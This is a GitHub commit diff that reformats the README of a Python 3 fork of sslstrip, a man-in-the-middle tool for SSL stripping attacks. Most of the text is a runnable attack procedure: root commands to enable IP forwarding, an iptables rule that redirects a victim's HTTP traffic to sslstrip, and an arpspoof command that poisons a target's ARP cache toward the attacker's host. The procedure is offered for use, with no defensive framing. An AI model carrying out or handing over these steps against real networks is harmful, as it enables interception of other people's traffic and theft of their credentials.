forked from moxie0/sslstrip
-
Notifications
You must be signed in to change notification settings - Fork 13
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #2 from leebaird/master
Cleaned up instructions.
- Loading branch information
Showing
1 changed file
with
14 additions
and
11 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,23 +1,26 @@ | ||
sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks. | ||
|
||
Ported from Python v2 to v3 by Jay Townsend (theHarvester, Discover and DNSrecon). | ||
Ported from Python v2 to v3 by Jay Townsend (theHarvester, Discover, and DNSrecon). | ||
* [](https://twitter.com/jay_townsend1) Jay "L1ghtn1ng" Townsend @jay_townsend1 | ||
|
||
Installing: | ||
pip3 install -r requirements.txt | ||
Run 'python setup.py install' as root to install or run it out of the directory. | ||
Requirements: | ||
```pip3 install -r requirements.txt``` | ||
|
||
Running: | ||
Run as root to install or run it out of the directory: | ||
```python3 setup.py install``` | ||
|
||
Running: | ||
sslstrip can be run from the source base without installation. | ||
Run 'python3 sslstrip.py -h' as a non-root user to get the command-line options. | ||
Run as a normal user to see options. | ||
```python3 sslstrip.py -h``` | ||
|
||
1. Enable IP forwarding (as root):<br> | ||
1. As root, enable IP forwarding:<br> | ||
```echo "1" > /proc/sys/net/ipv4/ip_forward``` | ||
|
||
2. Setup iptables to intercept HTTP requests (as root):<br> | ||
```iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>``` | ||
2. As root, setup iptables to intercept HTTP requests:<br> | ||
```iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <your listen port>``` | ||
|
||
3. Run sslstrip with the options you prefer. | ||
|
||
4. Run arpspoof to redirect traffic to your machine (as root):<br> | ||
```arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>``` | ||
4. As root, run arpspoof to redirect traffic to your host:<br> | ||
```arpspoof -i <your network interface> -t <target IP> <routers IP>``` |